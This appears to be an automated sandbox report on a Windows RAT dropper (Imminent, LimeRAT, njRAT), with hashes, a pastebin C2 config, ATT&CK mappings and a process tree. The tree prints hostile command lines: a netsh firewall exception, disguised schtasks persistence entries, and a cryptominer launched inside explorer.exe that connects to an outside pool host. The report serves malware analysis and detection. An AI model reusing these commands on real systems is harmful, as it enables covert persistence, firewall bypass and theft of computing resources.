imminent | 62598bb2bcf8af2ca769137e1a4021256154a6430e95edc5ddee02c4891618a0

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
02-05-2024 14:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe
Size

24.3MB
MD5

0ed1010a80a3e115d7800f2618e8b7dc
SHA1

a00cc5b7c932b519d711731012bc4fba7be4e6bd
SHA256

62598bb2bcf8af2ca769137e1a4021256154a6430e95edc5ddee02c4891618a0
SHA512

adc1b2616a7b57fa70c2bf236e2034d6cd2d35ed005967db187a94806d20155df32beb920b54a443725b5684cec145a4102dff6c2a0a801b041a23b9ff3f941d
SSDEEP

393216:d0pgWC+4cw08gMka47tPxDKdUU7K9HuNW7BqTOjDtXLEc3uoTHg:ZXjcCtkJPxkn8uw7Bq8X82g

Score

10^/10

imminent limerat njrat evasion persistence rat spyware trojan

Malware Config

Extracted

Family

limerat

Attributes

antivm
false
c2_url
https://pastebin.com/raw/cXuQ0V20
download_payload
false
install
false
pin_spread
false
usb_spread
false

Signatures

Imminent RAT
Remote-access trojan based on Imminent Monitor remote admin software.
trojan spyware imminent
LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

3092 netsh.exe

pid	process
3092	netsh.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

djoin.exe0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.execleaner.exeTorrent.exesdchange.exedjoin.exeCcleaner.exesdchange.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	djoin.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	cleaner.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	Torrent.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	sdchange.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	djoin.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	Ccleaner.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\Control Panel\International\Geo\Nation	sdchange.exe

Executes dropped EXE 11 IoCs

Processes:

Ccleaner.execleaner.exeTorrent.exeμTorrent.exeProject1.exeNetFramework.exesdchange.exedjoin.exedata.exesdchange.exedjoin.exe

pid	process
1348	Ccleaner.exe
3104	cleaner.exe
4928	Torrent.exe
3316	μTorrent.exe
776	Project1.exe
3132	NetFramework.exe
904	sdchange.exe
856	djoin.exe
2752	data.exe
3840	sdchange.exe
4276	djoin.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Torrent.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetFramework.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NetFramework.exe"	Torrent.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

27 pastebin.com
28 pastebin.com

flow	ioc
27	pastebin.com
28	pastebin.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	RegAsm.exe

AutoIT Executable 5 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\cleaner.exe	autoit_exe
C:\Users\Admin\secinit\sdchange.exe	autoit_exe
C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe	autoit_exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.execleaner.exeμTorrent.exesdchange.exedjoin.exeCcleaner.exesdchange.exedjoin.exe

description	pid	process	target process
PID 1560 set thread context of 1960	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	RegSvcs.exe
PID 3104 set thread context of 3252	3104	cleaner.exe	RegAsm.exe
PID 3316 set thread context of 456	3316	μTorrent.exe	explorer.exe
PID 904 set thread context of 2432	904	sdchange.exe	RegAsm.exe
PID 856 set thread context of 2728	856	djoin.exe	RegSvcs.exe
PID 1348 set thread context of 4960	1348	Ccleaner.exe	RegAsm.exe
PID 3840 set thread context of 4320	3840	sdchange.exe	RegAsm.exe
PID 4276 set thread context of 3052	4276	djoin.exe	RegSvcs.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4932 776 WerFault.exe Project1.exe

pid	pid_target	process	target process
4932	776	WerFault.exe	Project1.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	Taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	Taskmgr.exe

Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4928 schtasks.exe
2576 schtasks.exe
1112 schtasks.exe
1304 schtasks.exe
4168 schtasks.exe
1696 schtasks.exe
1148 schtasks.exe

pid	process
4928	schtasks.exe
2576	schtasks.exe
1112	schtasks.exe
1304	schtasks.exe
4168	schtasks.exe
1696	schtasks.exe
1148	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Torrent.exeProject1.exeμTorrent.exe

pid	process
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
4928	Torrent.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
4928	Torrent.exe
4928	Torrent.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
776	Project1.exe
3316	μTorrent.exe
3316	μTorrent.exe
3316	μTorrent.exe
3316	μTorrent.exe
3316	μTorrent.exe
3316	μTorrent.exe
3316	μTorrent.exe
3316	μTorrent.exe
3316	μTorrent.exe
3316	μTorrent.exe
3316	μTorrent.exe
3316	μTorrent.exe
3316	μTorrent.exe
3316	μTorrent.exe
3316	μTorrent.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

RegSvcs.exeTaskmgr.exe

pid process

1960 RegSvcs.exe
3976 Taskmgr.exe

pid	process
1960	RegSvcs.exe
3976	Taskmgr.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

Processes:

Torrent.exeμTorrent.exeexplorer.exeRegSvcs.exeNetFramework.exeTaskmgr.exeRegAsm.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	4928	Torrent.exe
Token: SeDebugPrivilege	3316	μTorrent.exe
Token: SeLockMemoryPrivilege	456	explorer.exe
Token: SeLockMemoryPrivilege	456	explorer.exe
Token: SeDebugPrivilege	1960	RegSvcs.exe
Token: SeDebugPrivilege	3132	NetFramework.exe
Token: SeDebugPrivilege	3976	Taskmgr.exe
Token: SeSystemProfilePrivilege	3976	Taskmgr.exe
Token: SeCreateGlobalPrivilege	3976	Taskmgr.exe
Token: 33	1960	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	1960	RegSvcs.exe
Token: SeDebugPrivilege	3252	RegAsm.exe
Token: SeDebugPrivilege	3252	RegAsm.exe
Token: SeDebugPrivilege	4960	RegAsm.exe
Token: 33	4960	RegAsm.exe
Token: SeIncBasePriorityPrivilege	4960	RegAsm.exe
Token: 33	4960	RegAsm.exe
Token: SeIncBasePriorityPrivilege	4960	RegAsm.exe
Token: 33	4960	RegAsm.exe
Token: SeIncBasePriorityPrivilege	4960	RegAsm.exe
Token: 33	4960	RegAsm.exe
Token: SeIncBasePriorityPrivilege	4960	RegAsm.exe
Token: 33	4960	RegAsm.exe
Token: SeIncBasePriorityPrivilege	4960	RegAsm.exe
Token: 33	4960	RegAsm.exe
Token: SeIncBasePriorityPrivilege	4960	RegAsm.exe
Token: 33	4960	RegAsm.exe
Token: SeIncBasePriorityPrivilege	4960	RegAsm.exe
Token: 33	4960	RegAsm.exe
Token: SeIncBasePriorityPrivilege	4960	RegAsm.exe
Token: 33	4960	RegAsm.exe
Token: SeIncBasePriorityPrivilege	4960	RegAsm.exe
Token: 33	4960	RegAsm.exe
Token: SeIncBasePriorityPrivilege	4960	RegAsm.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

Project1.exeTaskmgr.exe

pid	process
776	Project1.exe
776	Project1.exe
776	Project1.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

Project1.exeTaskmgr.exe

pid	process
776	Project1.exe
776	Project1.exe
776	Project1.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe
3976	Taskmgr.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

Project1.exeRegSvcs.exe

pid process

776 Project1.exe
776 Project1.exe
776 Project1.exe
1960 RegSvcs.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.execleaner.exeTorrent.exeμTorrent.exeRegSvcs.exesdchange.exedjoin.exeCcleaner.exe

description	pid	process	target process
PID 1560 wrote to memory of 1348	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	Ccleaner.exe
PID 1560 wrote to memory of 1348	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	Ccleaner.exe
PID 1560 wrote to memory of 1348	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	Ccleaner.exe
PID 1560 wrote to memory of 3104	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	cleaner.exe
PID 1560 wrote to memory of 3104	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	cleaner.exe
PID 1560 wrote to memory of 3104	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	cleaner.exe
PID 1560 wrote to memory of 4928	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	Torrent.exe
PID 1560 wrote to memory of 4928	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	Torrent.exe
PID 1560 wrote to memory of 3316	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	μTorrent.exe
PID 1560 wrote to memory of 3316	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	μTorrent.exe
PID 1560 wrote to memory of 776	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	Project1.exe
PID 1560 wrote to memory of 776	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	Project1.exe
PID 1560 wrote to memory of 776	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	Project1.exe
PID 1560 wrote to memory of 1960	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	RegSvcs.exe
PID 1560 wrote to memory of 1960	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	RegSvcs.exe
PID 1560 wrote to memory of 1960	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	RegSvcs.exe
PID 1560 wrote to memory of 1960	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	RegSvcs.exe
PID 1560 wrote to memory of 1960	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	RegSvcs.exe
PID 3104 wrote to memory of 3252	3104	cleaner.exe	RegAsm.exe
PID 3104 wrote to memory of 3252	3104	cleaner.exe	RegAsm.exe
PID 3104 wrote to memory of 3252	3104	cleaner.exe	RegAsm.exe
PID 3104 wrote to memory of 3252	3104	cleaner.exe	RegAsm.exe
PID 3104 wrote to memory of 3252	3104	cleaner.exe	RegAsm.exe
PID 1560 wrote to memory of 1112	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	schtasks.exe
PID 1560 wrote to memory of 1112	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	schtasks.exe
PID 1560 wrote to memory of 1112	1560	0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe	schtasks.exe
PID 3104 wrote to memory of 1304	3104	cleaner.exe	schtasks.exe
PID 3104 wrote to memory of 1304	3104	cleaner.exe	schtasks.exe
PID 3104 wrote to memory of 1304	3104	cleaner.exe	schtasks.exe
PID 4928 wrote to memory of 3132	4928	Torrent.exe	NetFramework.exe
PID 4928 wrote to memory of 3132	4928	Torrent.exe	NetFramework.exe
PID 3316 wrote to memory of 456	3316	μTorrent.exe	explorer.exe
PID 3316 wrote to memory of 456	3316	μTorrent.exe	explorer.exe
PID 3316 wrote to memory of 456	3316	μTorrent.exe	explorer.exe
PID 3316 wrote to memory of 456	3316	μTorrent.exe	explorer.exe
PID 3316 wrote to memory of 456	3316	μTorrent.exe	explorer.exe
PID 3316 wrote to memory of 456	3316	μTorrent.exe	explorer.exe
PID 3316 wrote to memory of 456	3316	μTorrent.exe	explorer.exe
PID 1960 wrote to memory of 3976	1960	RegSvcs.exe	Taskmgr.exe
PID 1960 wrote to memory of 3976	1960	RegSvcs.exe	Taskmgr.exe
PID 1960 wrote to memory of 3976	1960	RegSvcs.exe	Taskmgr.exe
PID 904 wrote to memory of 2432	904	sdchange.exe	RegAsm.exe
PID 904 wrote to memory of 2432	904	sdchange.exe	RegAsm.exe
PID 904 wrote to memory of 2432	904	sdchange.exe	RegAsm.exe
PID 904 wrote to memory of 2432	904	sdchange.exe	RegAsm.exe
PID 904 wrote to memory of 2432	904	sdchange.exe	RegAsm.exe
PID 904 wrote to memory of 4168	904	sdchange.exe	schtasks.exe
PID 904 wrote to memory of 4168	904	sdchange.exe	schtasks.exe
PID 904 wrote to memory of 4168	904	sdchange.exe	schtasks.exe
PID 856 wrote to memory of 2728	856	djoin.exe	RegSvcs.exe
PID 856 wrote to memory of 2728	856	djoin.exe	RegSvcs.exe
PID 856 wrote to memory of 2728	856	djoin.exe	RegSvcs.exe
PID 856 wrote to memory of 2728	856	djoin.exe	RegSvcs.exe
PID 856 wrote to memory of 2728	856	djoin.exe	RegSvcs.exe
PID 856 wrote to memory of 1696	856	djoin.exe	schtasks.exe
PID 856 wrote to memory of 1696	856	djoin.exe	schtasks.exe
PID 856 wrote to memory of 1696	856	djoin.exe	schtasks.exe
PID 1348 wrote to memory of 4960	1348	Ccleaner.exe	RegAsm.exe
PID 1348 wrote to memory of 4960	1348	Ccleaner.exe	RegAsm.exe
PID 1348 wrote to memory of 4960	1348	Ccleaner.exe	RegAsm.exe
PID 1348 wrote to memory of 4960	1348	Ccleaner.exe	RegAsm.exe
PID 1348 wrote to memory of 4960	1348	Ccleaner.exe	RegAsm.exe
PID 1348 wrote to memory of 1148	1348	Ccleaner.exe	schtasks.exe
PID 1348 wrote to memory of 1148	1348	Ccleaner.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1560
- C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
  "C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1348
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4960
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:3092
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /tn backgroundTaskHost /tr "C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe" /sc minute /mo 1 /F
    3⤵
    - Creates scheduled task(s)
    PID:1148
- C:\Users\Admin\AppData\Local\Temp\cleaner.exe
  "C:\Users\Admin\AppData\Local\Temp\cleaner.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3104
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
    3⤵
    - Maps connected drives based on registry
    - Suspicious use of AdjustPrivilegeToken
    PID:3252
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F
    3⤵
    - Creates scheduled task(s)
    PID:1304
- C:\Users\Admin\AppData\Local\Temp\Torrent.exe
  "C:\Users\Admin\AppData\Local\Temp\Torrent.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4928
- - C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
    "C:\Users\Admin\AppData\Local\Temp\NetFramework.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3132
- C:\Users\Admin\AppData\Local\Temp\μTorrent.exe
  "C:\Users\Admin\AppData\Local\Temp\μTorrent.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3316
- - C:\Windows\explorer.exe
    C:\Windows\explorer.exe -a cryptonight --url=redlan.hopto.org:3333 -p #PWD -R --variant=-1 -u GuyFlawkesMinerAdmin -k -t 4 --max-cpu-usage=50
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:456
- C:\Users\Admin\AppData\Local\Temp\Project1.exe
  "C:\Users\Admin\AppData\Local\Temp\Project1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:776
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 1064
    3⤵
    - Program crash
    PID:4932
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1960
- - C:\Windows\SysWOW64\Taskmgr.exe
    "C:\Windows\System32\Taskmgr.exe"
    3⤵
    - Checks SCSI registry key(s)
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:3976
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F
  2⤵
  - Creates scheduled task(s)
  PID:1112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 776 -ip 776
1⤵
PID:464

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4552

C:\Users\Admin\secinit\sdchange.exe
C:\Users\Admin\secinit\sdchange.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:904
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
  2⤵
  PID:2432
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F
  2⤵
  - Creates scheduled task(s)
  PID:4168

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe
C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:856
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2⤵
  PID:2728
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F
  2⤵
  - Creates scheduled task(s)
  PID:1696

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe
C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe
1⤵
- Executes dropped EXE
PID:2752

C:\Users\Admin\secinit\sdchange.exe
C:\Users\Admin\secinit\sdchange.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3840
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
  "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
  2⤵
  PID:4320
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F
  2⤵
  - Creates scheduled task(s)
  PID:4928

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe
C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4276
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2⤵
  PID:3052
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F
  2⤵
  - Creates scheduled task(s)
  PID:2576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log

Filesize
316B

MD5
9f893d94b017a0684012d50319c9ffbe

SHA1
140cc2cb6b2520ba4f9a1f666a5f679853472793

SHA256
8a7cb420c82edf1bb2c7bdfef52091e5169fabaecc370e120985e91406fcbbec

SHA512
